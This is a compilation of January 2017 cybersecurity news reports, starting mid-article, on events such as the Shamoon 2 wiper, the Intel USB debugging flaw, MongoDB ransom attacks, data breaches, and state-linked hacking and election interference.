“So, circling back around, what is Psp_Avoidance? Obviously, we don’t know – but if the acronym is correct, it would seem to be software built to evade personal security products, which directory listings suggest (as does ManTech) are antivirus programs.” wrote the expert.
“Should you run antivirus products? Sure. At Rendition Infosec we tell customers that operating without AV is like driving a car with no airbags. But this dump suggests that advanced attackers have mitigations for antivirus products – a sobering reality for organizations without defense in depth. “
The unique certainly at this moment is the availability for sale of a powerful arsenal also composed of hacking tools that could be exploited by a threat actor in the wild for large-scale espionage campaigns

But since this time the group has made Windows hacking tools up for sale, the chances are that hackers and espionage groups would be interested in buying these hacking tools.

A Second variant of Shamoon 2 targets virtualization products
11.1.2017 securityaffairs

A second variant of the Shamoon 2 malware was discovered by researchers at Palo Alto Networks, this threat also targets virtualization products.
A new strain of the Shamoon 2 malware was spotted by the security experts at Palo Alto Networks, this variant targets virtualization products.

Shamoon, also known as Disttrack, was first spotted in a wave of attacks that targeted companies in Saudi Arabia in 2012. Among the victims, there was the petrol giant Saudi Aramco. The principal capability of Shamoon is a feature that allows it to wipe data from hard drives of the infected systems.

In the attack against Saudi Aramco Shamoon wipe data on over 30,000 computers and rewrite the hard drive MBR (Master Boot Record) with an image of a burning US flag.

The first team that discovered the malware was Kaspersky Lab that had analyzed some instances of the threat linked to the “wiper agent” due to the presence of a module of a string with a name that includes “wiper” as part of it.

The researcher of Seculert who analyzed Shamoon discovered that it has also the ability to overwrite the machine’s MBR. Before Shamoon makes unusable the infected PC, it gathers data from the victim, it steals information, taking data from the ‘Users’, ‘Documents and Settings’, and ‘System32/Drivers’ and ‘System32/Config’ folders on Windows computers, and send them to another infected PC on the same internal network.

In December malware researchers from Palo Alto Networks and Symantec discovered a new variant, so-called Shamoon 2, that was used at least in a targeted attack against a single Saudi organization, the Saudi Arabia’s General Authority of Civil Aviation (GACA).

“Why Shamoon has suddenly returned again after four years is unknown. However, with its highly destructive payload, it is clear that the attackers want their targets to sit up and take notice,” reported Symantec.

“Last week, Unit 42 came across new Disttrack samples that appear to have been used in an updated attack campaign. The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks. It appears the purpose of the new Disttrack samples were solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016/11/17 20:45. In another similarity to Shamoon, this is the end of the work week in Saudi Arabia (their work week is from Sunday to Thursdays), so the malware had potentially the entire weekend to spread. The Shamoon attacks took place on Lailat al Qadr, the holiest night of the year for Muslims; another time the attackers could be reasonably certain employees would not be at work.” reads an analysis published by Palo Alto Networks.

Now the second variant of Shamoon 2 was spotted by Palo Alto Networks that had been configured to start wiping infected systems at 1:30 AM (Saudi Arabia time) on November 29, when the employees of the targeted organization’ were likely at home.

The first variant of Shamoon 2 analyzed by the experts presented a default configuration that allowed the execution of the disk-wiping component at 8:45pm local time on Thursday, November 17. Considering that in Saudi Arabia the working week runs from Sunday to Thursday, the attacker tried to exploit the pause in order to maximize the effects of the attack.

Both payloads were similar, but the analysis of the experts revealed some differences.

The second Shamoon 2 variant included credentials for virtualization products from Huawei, it targeted virtual desktop infrastructure (VDI) products such as FusionCloud.

This circumstance suggests that attackers were aware that the target organization used this specific virtualization product. The hackers used default credentials reported in the product official documentation, this means they were hoping that the targeted organizations had not changed them. According to the experts, threat actors may have had access to appliances hosting the infrastructure.

“VDI solutions can provide some protection against a destructive malware like Disttrack through the ability to load snapshots of wiped systems. Also, since FusionCloud systems run a Linux operating system, which would not be susceptible to wiping by the Windows-only Disttrack malware, this could be seen as a reasonable countermeasure against attacks like Shamoon,” reads the blog post published by Palo Alto Networks.

“However, if the attacker was able to log into the VDI management interfaces using the account credentials they could manually carry out destructive activities against the VDI deployment, as well as any snapshot,”

Researchers observed that communications module used by the threat was configured without a C&C, the module completely lack any IP address or domain name for a C2 server within its configuration.

I suggest you give a look at the report that also includes Indicators of Compromise for the threat.

Debugging mechanism in Intel CPUs allows seizing control via USB port
10.1.2017 SC Magazine UK Hacking

Researchers are warning that an Intel chip debugger leaves the chip open to hacking and because it sits below the software layer isn't easily detected.
Are attacks on the physical layer on the rise?
Researchers from Positive Technologies have revealed that some new Intel CPUs contain a debugging interface, accessible via USB 3.0 ports, that can be used to obtain full control over a system and perform attacks that are undetectable by current security tools.
An attacker could use this to bypass all security systems for the embedding of code over a certain period of time, reading all possible data and even making the machine inoperative, for instance by re-writing its BIOS.
A talk on the mechanisms needed for such attacks, and ways to protect against them, was given by Maxim Goryachy and Mark Ermolov at the 33rd Chaos Communication Congress in Hamburg, Germany.
The duo noted: “These manufacturer-created hardware mechanisms have legitimate purposes, such as special debugging features for hardware configuration and other beneficial uses. But now these mechanisms are available to attackers as well. Performing such attacks does not require nation-state resources or even special equipment.”
The duo analysed and demonstrated one of these mechanisms in their presentation. The JTAG (Joint Test Action Group) debugging interface, now accessible via USB, has the potential to enable dangerous and virtually undetectable attacks. JTAG works below the software layer for the purpose of hardware debugging of the OS kernel, hypervisors and drivers. At the same time, though, this CPU access can be abused for malicious purposes.
On older Intel CPUs, accessing JTAG required connecting a special device to a debugging port on the motherboard (ITP-XDP). JTAG was difficult to access for both troubleshooters and potential attackers.
However, starting with the Skylake processor family in 2015, Intel introduced the Direct Connect Interface (DCI) which provides access to the JTAG debugging interface via common USB 3.0 ports.
No software or hardware manipulations are required to make target computers vulnerable — merely having the DCI interface enabled is sufficient. As the researchers found, this can be accomplished in several ways, and on many computers, DCI is enabled out-of-the-box and not blocked by default.
SC Media UK spoke with Maxim Goryachy, and asked how would someone go about tricking someone into enabling the DCI interface?
Goryachy said: “There are several ways someone could do this. An attacker could change the BIOS configuration (for example, with a use of a Flash programmator) when they have physical access to the equipment during manufacturing, storage or usage. Some BIOSs do not block the DCI configuration which is why there is the possibility of turning on the DCI.”
Goryachy and Ermolov speculated that this mechanism in Intel CPUs could lead to a whole new class of Bad USB-like attacks, but at a deeper and even more dangerous level than their predecessor.
In their concluding remarks, the researchers proposed a number of protective measures based on use of Intel's BootGuard feature and forbidding activation of the debugging interface.
SC asked Goryachy if he would compare this vulnerability to Stuxnet, to which he said: “This mechanism can be used on a hacked system regardless of the OS installed. Stuxnet was infecting only Windows machines, meanwhile the DCI can be used on any system with Intel U-series processor. This series is used on laptops and NUC. As of today, no publicly available security system will detect it.”
Goryachy told SC, “We have reported this case to Intel. As of today, this mechanism can be exploited only on Intel U-series processors.”

Los Angeles College Pays Hackers $28,000 Ransom To Get Its Files Back
10.1.2017 thehackernews

Ransomware has turned on to a noxious game of Hackers to get paid effortlessly.
Once again the heat was felt by the Los Angeles Valley College (LAVC) when hackers managed to infect its computer network with ransomware and demanded US$28,000 payment in Bitcoins to get back online.
The cyber-attack occurred over winter break and caused widespread disruption to online, financial aid, email and voicemail systems, including locking out 1,800 students and staffs from their computers.

As the situation was gone out of its hand, the Los Angeles Community College District (LACCD) agreed to pay the ransom demand of $28,000 in Bitcoin to criminals to resume their operations after gaining the decryption keys, the school newspaper, The Valley Star, reports.
The cyber criminals gave the college a week to pay the ransom and threatened to delete all the data if they were not paid.
Also Read: RansomFree Tool Detects Never-Seen-Before Ransomware Before It Encrypts Your Data
Just like most ransomware victims the college obviously was not properly backing up the data. Therefore, the district agreed to pay up the ransom amount to quickly recover access to their systems and data.
However, according to the college officials, it was ultimately cheaper for them to pay the ransom than to remove the unknown ransomware virus from their systems to recover data and resume other services.

After paying the ransom, the college was given a ransomware decryption key to retaining access to its valuable data.
"LACCD and LAVC information technology staff, outside cybersecurity experts and law enforcement are working together to determine the specific nature and impact of this incident. Our top priority is the integrity of student, faculty and employee data, and we will continue to communicate with the LAVC community and the public as the investigation proceeds." the College wrote in a report [PDF].
The college was lucky this time, because, in the case of ransomware, there is no guarantee that one will get the right decryption key in return. For example, recently discovered KillDisk Ransomware that targets Linux machines, demands $218,000 to decrypt, but in return, wipes out data permanently.
One of the most notorious examples of ransomware attacks took place in March last year when crooks locked down the computers and sealed all sensitive files of a Los Angeles hospital, including patient data, which eventually made the hospital to pay $17,000.
Last year, we saw an enormous rise in Ransomware threats, both in numbers and sophistication, and the only way to secure your environment is to deploy automated and isolated backup mechanism.

CVE-2016-7200 & CVE-2016-7201 Edge flaws added to the Sundown Exploit Kit
10.1.2017 securityaffairs

The operators behind the Sundown exploit kit have started using two Microsoft Edge flaws just a few days after researchers published a PoC exploit.
The Sundown exploit kit is becoming one of the most popular crimeware kits in the hacking underground. The last time we saw it was at the end of 2016 when malware researchers spotted a new variant of the Sundown exploit kit leverages on steganography to hide exploit code in harmless-looking image files.

Recently cyber criminals added to the Sundown exploit kit two Edge vulnerabilities tracked as CVE-2016-7200 and CVE-2016-7201.

Both flaws were addressed by Microsoft with a security bulletin (MS16-129) issued in November 2016. The flaws reside in the way the Chakra JavaScript scripting engine handles objects and can trigger memory corruption.

A remote attacker can exploit the vulnerabilities to execute arbitrary code in the context of the current user by tricking victims into visiting a specially crafted website.

On January 4, security experts at the firm Theori confirmed the availability of a PoC exploit for CVE-2016-7200 and CVE-2016-7201, just a few days and the code was included in the Sundown exploit kit.

Theori @theori_io
Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) —https://github.com/theori-io/chakra-2016-11 …
00:52 - 5 Gen 2017
Photo published for theori-io/chakra-2016-11
chakra-2016-11 - Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201)
210 210 Retweet 196 196 Mi piace
The popular security researcher Kafeine confirmed the exploits being integrated by the Sundown exploit kit.

Sundown exploit kit

“The exploits are spotted first in Sundown, but integration in RIG/Empire/Neutrino/Magnitude/Kaixin should be a matter of hours/days.” explained Kafeine.

Crooks leveraged Sundown exploit kit to deliver mostly ZLoader, it was also used to deliver other malicious payloads, including Zeus Panda, Dreambot, Chthonic, Andromeda, Neutrino Bot, Betabot, Smokebot, Remcos, Kronos and a bitcoin miner.

According to Malwarebytes Labs, a variant of the Sundown exploit kit was recently seen distributing a cryptocurrency Monero mining application.

“We recently encountered an atypical case of Sundown EK in the wild – usually the landing page is obfuscated, but in this case there was plain JavaScript. The exploit was dropping some malicious payloads” reads a blog post published by Malwarebytes Labs.

Kafeine highlighted the fact that this is the first true innovation in the exploit kit landscape since 6 months, he also added that the criminal ecosystem lost its locomotive the “Angler EK.”

“After not far from 6 months without new exploit integrated in an EK ecosystem which has lost its innovation locomotive (Angler) , the drive-by landscape is struggling to stay in shape. Low infection rate means more difficulties to properly convert bought traffic.” added Kafeine.

Last time malware researchers observed the introduction of a fresh exploit code in an Exploit Kit was this summer when malware authors added the PoC for CVE-2016-0189 to the Neutrino exploit kit.

Hello Kitty database leaked online, 3.3 million fans affected
10.1.2017 securityaffairs Incindent

 The Hello Kitty MongoDB database leaked online one year ago recently surface on the web, it includes 3.3 million records belonging to Hello Kitty fans.
The security researcher Chris Vickery discovered a Sanrio database that was misconfigured and exposed to the public in 2015.

On December 2015, Vickery reported the discovery to Databreaches.net and Salted Hash.

According to Vickery not only the primary database sanriotown.com was affected, the fan portals of the following websites were also impacted by the leak:

The expert noticed that 186,261 of the records belonged to Sanrio users under the age of 18.

At the time of its discovery, Sanrio explained that it doesn’t believe the data was stolen. Now the same MongoDB database has surfaced online and the 3.3 million records put Hello Kitty fans at risk.

During the weekend, the data breach notification service LeakedSource confirmed that a Sanrio database containing 3,345,168 million users has surfaced online.

The records contained in the leaked database include first and last names, gender, encoded birthday (easily reversible), country, email addresses, SHA-1 hash passwords, password hint questions with corresponding answers, and other information.

Hello Kitty portal

Vickery confirmed that data available via LeakedSource is identical to what he discovered more than a year ago.

The unique difference between the two databases is a field, dubbed ‘incomeRange,’ in the LeakedSource records that was not present in the original archive. The “incomeRange” attribute comes with values running from 0 to 150, but it is still unclear its meaning.

Chris Vickery discovered many other clamorous cases of open MongoDB exposed on the Internet. In December 2015 the security expert discovered 191 million records belonging to US voters online, in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.
In March 2016, Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.

A few hours ago I published another post related to cyber attacks against misconfigured MongoDB databases.

MongoDB ransom attacks soar, according to the Australian Communications and Media Authority Antipodes the number of hacked systems more than double to 27,000 in just a day. According to the experts, the hackers are implementing an extortion mechanism copying and deleting data from vulnerable databases.

Number of MongoDB ransom attacks peaked 27,000 in a day
10.1.2017 securityaffairs Virus

According to the Australian Communications and Media Authority Antipodes the number of hacked MongoDB databases more than double to 27,000 in just a day.
MongoDB ransom attacks soar, according to the Australian Communications and Media Authority Antipodes the number of hacked systems more than double to 27,000 in just a day. According to the experts, the hackers are implementing an extortion mechanism copying and deleting data from vulnerable databases.

Crooks request the payment of a ransom in order to return data and help the company to fix the flaw they exploited. Last week I reported the story of a mysterious attacker that goes online with the harak1r1 moniker, he is breaking into unprotected MongoDB databases, stealing their content, and requesting for a 0.2 bitcoins (US$184) ransom to return the data.bitcoins (US$184) ransom to return the data.

The attacks were discovered by the Co-founder of the GDI Foundation, Victor Gevers, who warned of poor security for MongoDB installations in the wild. The security expert has discovered 196 instances of MongoDB that were wiped by Harak1r1 and being held for ransom.

The analysis of the Bitcoin wallet used by Harak1r1 revealed that at least 22 victims appeared to have paid.


5 Gen
Adrian Sanabria @sawaba
@SteveD3 @LawrenceHecht @achillean @akmalchaudhri @0xDUDE FWIW, in my experience, Shodan is a varying fraction of what's actually out there.
Victor Gevers @0xDUDE
@sawaba @SteveD3 @LawrenceHecht @achillean @akmalchaudhri That is why I am looking at different sources like Zoomeye (99,491 candidates) pic.twitter.com/VApFdRbF7g
18:17 - 5 Gen 2017
Visualizza l'immagine su Twitter
1 1 Retweet 3 3 Mi piace
According to the security researcher Niall Merrigan the number of attacks have soared from 12,000 earlier today to 27,633 in just 12 hours. According to the expert the attacks were powered by at least 15 different actors. One of the attackers goes online with the moniker ‘kraken0’ has compromised 15,482 MongoDB databases demanding victims the payment of 1 bitcoin ($US921).

Visualizza l'immagine su Twitter

Niall Merrigan @nmerrigan
Latest #Mongodb ransack looks like ~27K servers compromised from 12K this morning.. Numbers and info https://docs.google.com/spreadsheets/d/1QonE9oeMOQHVh8heFIyeqrjfKEViL0poLnY8mAakKhM/edit?usp=sharing … with @0xDUDE
23:03 - 8 Gen 2017
51 51 Retweet 30 30 Mi piace
The researcher is collecting information on the attacks including information provided by Victor Gevers.

The Australian Communications and Media Authority Antipodes is monitoring exposed MongoDB installations since July 2015 using intelligence provided by the ShadowServer nonprofit.

The organization reports about 400 exposed MongoDB databases a day to 90 percent of Australia’s network providers via the Australian Internet Security Initiative (AISI).

AISI statistics on Exposed MongoDB published by ElReg

Stay tuned …

Over 27,000 MongoDB Databases Held For Ransom Within A Week
9.1.2017 thehackernews
The ransomware attacks on poorly secured MongoDB installations have doubled in just a day.
A hacker going by the handle Harak1r1 is accessing, copying and deleting unpatched or badly-configured MongoDB databases and then threatening administrators to ransom in exchange of the lost data.
It all started on Monday when security researcher Victor Gevers identified nearly 200 instances of a MongoDB installation that have been erased and held for ransom, asking victims to pay hefty ransoms for the data to be restored.
By Tuesday, this number reached approximately 2,000 databases as reported by Shodan Founder John Matherly, and by Friday, Gevers and fellow security researcher Niall Merrigan updated this count to 10,500.

However, according to recent statistics compiled by Merrigan, the number of compromised systems have reached more than double to 27,000, over the course of about 12 hours.
What's worse?
Initial attacks saw ransoms of 0.2 Bitcoins (nearly US$184) to the attacker, of which 22 victims appeared to have paid. But now the attacker is demanding up to 1BTC (around 906 USD).
The researchers have logged some 15 distinct attackers, of which an attacker using email handle kraken0 has compromised 15,482 MongoDB instances and is demanding 1 Bitcoin to return the lost data, though no one appears to have paid.
This means that after the initial story was made public, more hackers and the group of hackers are also doing same — accessing, copying and deleting badly-configured MongoDB databases — for ransom.
Who is responsible for the MongoDB Ransomware?

You! Yes, all those administrators who are using misconfigured MongoDB databases are the reason for this sudden spurt in these attacks.
In every case, the target MongoDB server had an administrator account that was configured without a password.
Many poorly secured MongoDB databases can be identified using Shodan search engine, which currently shows more than 99,000 vulnerable MongoDB instances.
This is the case when the company provides an easy way to set up authentication in MongoDB.
How to Protect Yourself?
Since there's no evidence the hackers had copied the data before deleting it, promises to restore the already-deleted databases in return for a hefty ransom are dubious.
Gevers advises affected MongoDB database owners not to pay and to get help from security professionals. He and Merrigan have helped some 112 victims secure their exposed MongoDB databases.
People who administer websites that use MongoDB are advised to follow these steps:
Enable authentication that provides you 'Defense in depth' if your network is compromised. Edit your MongoDB configuration file — auth = true.
Use firewalls — Disable remote access to the MongoDB, if possible. Avoid common pitfalls by blocking access to port 27017 or binding local IP addresses to limit access to servers.
Administrators are strongly recommended to update MongoDB software to the latest release.
Meanwhile, MongoDB developers have released an updated guide to MongoDB security, explaining these ransomware-inspired attacks and how you can detect and prevent them, along with the steps to check the integrity of your

ESEA data breach, 1.5 million gamers’ records leaked
9.1.2017 securityaffairs Incindent

The E-Sports Entertainment Association (ESEA), one of the largest competitive video gaming communities was hacked, 1.5 million players have been affected.
Bad news for gamers, the E-Sports Entertainment Association (ESEA), one of the largest competitive video gaming communities was hacked in December. The data breach exposed the profiles of more than 1.5 million players.

The incident was also confirmed on Saturday by the breach notification service LeakedSource that reported 1,503,707 ESEA records were compromised.

The records include username, first and last name, password bcrypt hash, email address, registration date, city, state (or province), last login, date of birth, zip code, phone number, website URL, Steam ID, Xbox ID, and PSN ID.

As you can see the profiles are very detailed, the use of the bcrypt hash protect users’ passwords, anyway gamers are exposed to a wide range of malicious activities such as social engineering attacks and spear phishing attacks.

ESEA shared the link to the following “Outage and Security Update” via Twitter.

“Recently news has been made that ESEA’s user data has been leaked online. We expected something like this could happen but have not confirmed this is ESEA’s data. We notified the community on December 30th, 2016 about the possibility this could happen. The type of data and storage standards was disclosed. We have been working around the clock to further fortify security and will bring our website online shortly when that next round is complete. This possible user data leak is not connected to the current service outage.”

ESEA Outage and Security Update

Read: http://tl.gd/n_1spgt4i
04:29 - 8 Gen 2017
47 47 Retweet 100 100 Mi piace
The company was informed of the data breach on December 27 and issued a security warning on December 30, 2016. At the time I was writing, ESEA only confirmed the data leak, but still hasn’t admitted that profiles were accessed from its systems.

The news of the ESEA data breach is circulating on the Internet, many players confirmed it on Reddit.

Jimmy Whisenhunt ✔ @jimmywhis
.@BigSecurityNews confirmed my ESEA account info after they asked a couple 'larger' followed users to help verify
05:10 - 8 Gen 2017
8 8 Retweet 16 16 Mi piace
Jimmy Whisenhunt ✔ @jimmywhis
.@BigSecurityNews confirmed my ESEA account info after they asked a couple 'larger' followed users to help verify
05:10 - 8 Gen 2017
8 8 Retweet 16 16 Mi piace
Salted HASH, quoting a LeakedSource spokesperson, reported that the ESEA data breach was part of a ransom scheme. Crooks demanded $50,000 in payment to avoid disclosing the hack.

In response to the incident, the company reset passwords, multi-factor authentication tokens, and security questions.

Crooks target UK schools with ‘Department of Education’ ransomware
9.1.2017 securityaffairs

Action Fraud is warning of ‘Department of Education’ ransomware, crooks are posing government officials to trick people into installing ransomware.
This is a story of another string of cyber attacks that leverage ransomware to compromise victims’ machines.

Cyber criminals are targeting schools in the UK, asking victims to pay up to £8,000 to unlock data to unlock encrypted documents.

The British Action Fraud is warning of fraudsters that are posing government officials from the Department of Education in order to trick people into installing ransomware on their computers.

The crooks are initially cold calling education establishments asking for the head teachers’ email addresses, then target them with malicious messages having zip attachments supposedly containing sensitive information. The attachments contain the ransomware.

“Fraudsters are initially cold calling education establishments claiming to be from the “Department of Education”. They then ask to be given the personal email and/or phone number of the head teacher/financial administrator.” reads the advisory published by ActionFraud.

“The fraudsters claim that they need to send guidance forms to the head teacher (these so far have varied from exam guidance to mental health assessments). The scammers on the phone will claim that they need to send these documents directly to the head teacher and not to a generic school inbox, using the argument that they contain sensitive information.”

Educational establishments must be vigilant of such kind of threats and have to check that their systems are up-to-date.

The Action Fraud organization added that similar scams have been carried on by fraudsters claiming to be from the Department for Work and Pensions and telecoms providers. In both cases the cyber criminals target the head teacher.

How to avoid such kind of scams?

First of all, being vigilant of any suspicious activity, even when attackers seem to know your personal details or have details about your staff. In the specific case, note that the “Department of Education” is not a real government department. Hackers used it instead of the real name Department for Education.
Having up-to-date defense solutions and software (i.e. OS and applications).
Never open attachments in unsolicited emails neither click on embedded links.
Make regular backups of your data. Be sure that the data are stored on an external storage system.

Recent power outages in Turkey were also caused by cyber attacks
9.1.2017 securityaffairs Cyber

Turkish Energy Minister Berat Albayrak believes that power outages in Istanbul and other areas in Turkey have also been caused by cyber attacks.
According to Turkish Energy Minister Berat Albayrak, Istanbul and other areas in Turkey have been experiencing power outages since last week. The power outages were caused by sabotage of underground powerlines and cyberattacks originating in the US.
“Yesterday, we faced an intense, US-originated cyber attack. These attacks have been carried out systematically on different parts of the Energy Ministry, but we have repelled them all,” explained the Turkish Energy Minister in an interview with A Haber TV.
The technicians discovered sabotage of underground lines in three districts of Istanbul in concomitance of adverse weather conditions.

snow power outages
People walk on Taksim square during snowfalls in Istanbul on January 7, 2017.
A heavy snowstorm paralysed life in Istanbul with hundreds of flights cancelled and the Bosphorus closed to shipping traffic. The snowstorm dumped almost 40 centimetres (16 inches) of snow in parts of the Turkish metropolis overnight, causing havoc on roads as travellers sought to leave the city for the weekend getaway. / AFP PHOTO / YASIN AKGUL

In a first time, the Energy Ministry reported the power outages were caused by damage to the power grid caused by the snow.

Recently, a source in the ministry confirmed to the state news agency Anadolu that the problems were also caused by cyber attacks.

“Many infiltration attempts to the systems controlling our transmission and electricity producing lines were determined and prevented. The infiltration attempts are indicators of a major sabotage preparation against Turkey’s national electricity network,” the anonymous source told the agency.

The Turkish Government continues to accuse US-based Turkish preacher Fethullah Gulen of using a wide network of supporters in Turkey to undermine the country’s stability.

Gulen denies any accusations and the US refuses to comply the Turkish request for his extradition.

Some prominent experts believe that Turkish authorities are facing with sabotage and problems to legacy infrastructure using “cyber” as a scapegoat for the situation.

French Minister Le Drian on cyber espionage: France is not immune, ready to hack back
9.1.2017 securityaffairs Cyber

Defense Minister Le Drian comments expressed concerns about cyber attacks against defense systems and warns of hacking campaigns on the upcoming elections.
According to the Defence Minister Jean-Yves Le Drian France defense was targeted by thousands of attacks in 2016. France thwarted more than 24,000 cyber attacks against Defence systems last year.

The Minister confirmed that thousands of attacks from external sources targeted the defense architecture, including France’s drone systems, but all the attacks have been repelled.

The number of cyber attacks in France has increased in a significant way substantially across the last three years. According to Mr Le Drian, hacking attacks represents a serious threat to national infrastructure.

The French Defence Minister revealed that cyber attacks were doubling every year and expressed concerns about possible offensives against this year’s presidential election.

In an interview with Le Journal du Dimanche newspaper, the French Minister said that France “should not be naive”.

French Minister Le Drian on cyber espionage

The Minister warns of possible cyber attacks like the ones that targeted the 2016 US Presidential Election.

In France, the conservative candidate Francois Fillon has been praised by Russian president Vladimir Putin due to its intention to intensify the relationship with the Kremlin. On the other side, the candidate Marine Le Pen is in total opposition to Russia, for this reason, the experts believe that hackers could target him and his party.

Relations between Russia and France are not good due to the position of President Hollande on the dispute between Russia and Ukraine in the 2014 Crimean Crysis.

President Hollande also blamed Russia of war crimes over its bombardment of the Syrian city of Aleppo.

The Minister is overseeing an overhaul of the cyber-security operations conducted by his Government.

“Our services have discussed the subject, if only to learn lessons for the future,” said Le Drian, who also referred to a cyber attack against the 2015 French TV station TV5Monde.

According to many security firms, including FireEye, the Russian APT 28 group was involved in the attack against the French TV station.

According to security experts at FireEye, the Russian ATP28 (also known as Pawn Storm, Tsar Team, Fancy Bear and Sednit) may have used the name of ISIS as a diversionary strategy, the experts noticed a number of similarities in the TTPs used by the Russian group and the one who breached the network at TV5Monde.

I found very interesting the posture of the French Minister, he is aware that foreign hacker could break into national infrastructure, but he also contemplate the possibility to strike back the attackers.He said the French army’s number of “digital soldiers” would be doubled to 2,600 by 2019, with

Le Drian confirmed that number of “digital soldiers” working for the French defense would be doubled to 2,600 by 2019, 600 cyber experts will joint to the cyber army.

“Le Drian said that in case of a cyber attack, the country could respond in kind as well as with conventional weapons.” reported the Reuters Agency.

FTC filed a lawsuit against D-Link over failure to secure its IoT devices
8.1.2017 securityaffairs

FTC charges the Taiwanese IT giant D-Link putting consumers’ privacy at risk due to the failure of Implementing secure adequate measures for IoT devices.
The U.S. Federal Trade Commission (FTC) has filed a lawsuit against the Taiwanese firm D-Link, over failure to secure its IoT products, including IP cameras and routers.

The company has produced promotional materials ensuring “Advanced Network Security” for its products, but the reality is different because according to the authorities it has failed to fix flaws exposing consumers to risk.
“A lawsuit the FTC filed against D-Link, a global manufacturer of computer networking equipment and other connected devices, alleges that the company made deceptive claims about the security of its products and engaged in unfair practices that put consumers’ privacy at risk.” reads the announcement from FTC.
The lawsuit includes examples of the D-Link’ choices that put consumers’ privacy at risk:
D-Link allegedly hard-coded login credentials into D-Link camera software that could allow unauthorized access to cameras’ live feed.
D-Link allegedly left users’ login credentials for its mobile app unsecured in clear, readable text on consumers’ devices.
D-Link allegedly mishandled its own private key code used to sign into D-Link software and as a result, it was publicly available online for six months.
D-Link allegedly failed to take reasonable steps to prevent command injection, a known vulnerability that lets attackers take control of people’s routers and send them unauthorized commands.
Usually, hackers that find the flaws report them to the company giving it the necessary time to solve the problems before publicly disclose the vulnerability. Over the past year, some hackers decided to disclose unpatched flaws due to the company’s failure to release necessary security updates that will fix the vulnerabilities.
The Tech giant has been accused of failing to take reasonable steps to secure the software for its IoT devices and for conducting practices that are “likely to cause, substantial injury to consumers in the United States.”
This isn’t the first time that IoT manufacturers tell customers that their products are totally secure while they lack to adopt the necessary security measures.
Earlier 2016, the FTC filed a lawsuit against Asus claiming that the company has put hundreds of thousands of consumers at risk through a series of critical flaws discovered in its products.
“Hackers are increasingly targeting consumer routers and IP cameras — and the consequences for consumers can include device compromise and exposure of their sensitive personal information,” said Jessica Rich, director of the FTC’s Bureau of Consumer Protection. “When manufacturers tell consumers that their equipment is secure, it’s critical that they take the necessary steps to make sure that’s true.”

China-Linked DragonOK APT Group continues updating tools and tactics
8.1.2017 securityaffairs

The China-linked DragonOK continues updating tools and tactics and targeted entities in various countries, including Russia and Tibet.
It was September 2014, when security researchers at FireEye spotted for the first time the cyber espionage activities of a Chinese state-sponsored group dubbed DragonOK.

At the time, FireEye discovered two hacking campaigns conducted by distinct groups operating in separate regions of China that seem to work in parallel.

The first team of hackers named Moafee, targeted military and government organizations which were in some way involved in South China sea dispute. The attackers hit different organizations as explained by the researchers at FireEye in a blog post, and appears to operate from the Guangdong Province and hit entities working in the defense industry in the United States.

The second team, dubbed DragonOK, conducted corporate espionage operations on high-tech and manufacturing companies in Japan and Taiwan.

DragonOK is back and recently targeted Japanese organizations in several industries, including manufacturing, technology, energy, higher education and semiconductor.

While Japan is considered the main target of the APT, hackers also targeted individuals or organizations in Taiwan, Tibet, and Russia.

According to the experts at Palo Alto Networks, one of the malware used by the DragonOK APT was dubbed Sysget and was used to target entities in Taiwan.

The Sysget malware was delivered both directly via phishing emails, as well as in RTF documents triggering the CVE-2015-1641 flaw that in turn leveraged a unique shellcode. The experts observed three distinct new versions of Sysget malware that were improved to make harder the detection and the analysis by security solutions.

PaloAlto also observed DragonOK hackers using other two families malware, the IsSpace and TidePool.


“IsSpace” is an evolution of the NFlog backdoor used by both DragonOK and Moafee. The second malware TidePool was observed earlier this year in targeted attacks powered by a different Chinese APT group, dubbed Operation Ke3chang.

Back in 2013, the security researchers at FireEye spotted a group of China-Linked hackers that conducted an espionage campaign on foreign affairs ministries in Europe. The campaign was named ‘Operation Ke3chang,’ the same threat actors were spotted targeting personnel at Indian embassies across the world earlier this year.

DragonOK now used the TidePool malware in targeted attacks against organizations in Russia and Tibet.

The analysis published by Palo Alto Networks researchers included links between the C&C domains of the various malware used by the DragonOK (i.e. TidePool, IsSpace and Sysget), and other Indicators of Compromise.

“The DragonOK group are quite active and continue updating their tools and tactics. Their toolset is being actively developed to make detection and analysis more difficult. Additionally, they appear to be using additional malware toolsets such as TidePool.” states Palo Alto Networks. “While Japan is still the most-targeted region by this group, they look to be seeking out victims in other regions as well, such as Taiwan, Tibet, and Russia.”

President Putin ordered cyber attacks and propaganda to influence US Election
7.1.2017 securityaffairs Cyber

Putin ordered cyber attacks and propaganda to influence Election. Reading the “Assessing Russian Activities and Intentions in Recent US Elections” Report.
The US Office of the Director of National Intelligence (ODNI) has released an unclassified version of intel community’s findings on activities conducted by the Russian Government in the attempt to influence the 2016 US Presidential Election through cyber attacks and online propaganda.

According to the report, the Russian President Vladimir Putin “ordered” a wide-ranging effort to influence the American vote in favor of President-Elect Donald Trump.
“We assess Russian President Vladimir Putin ordered an influence campaign in 2016 aimed at the US presidential election. Russia’s goals were to undermine public faith in the US democratic process, denigrate Secretary Clinton, and harm her electability and potential presidency. We further assess Putin and the Russian Government developed a clear preference for President-elect Trump. We have high confidence in these judgments,” the report said.
“We also assess Putin and the Russian Government aspired to help President-elect Trump’s election chances when possible by discrediting Secretary Clinton and publicly contrasting her unfavorably to him. All three agencies agree with this judgment. CIA and FBI have high confidence in this judgment; NSA has moderate confidence.”

The Russia tasked its cyber army of conducting cyber espionage campaigns against policy parties, and the Democratic National Committee (DNC) in 2015. The Kremlin also used an army of online trolls to conduct online propaganda and PSYOPs aimed to spread fake news and influence public sentiment.

According to the report released by ODNI, the Russian General Staff Main Intelligence Directorate (GRU), participated in the operations since March of 2016.

“We assess that the GRU operations resulted in the compromise of the personal e-mail accounts of Democratic Party officials and political figures. By May, the GRU had exfiltrated large volumes of data from the DNC,” reads the report.

According to the US intelligence, the mysterious hacker Guccifer 2.0 who passed the stolen information to WikiLeaks was an entity operated by the GRU.

The ODNI report states Russian hackers gathered intelligence on US Presidential Election and technology used since 2014.
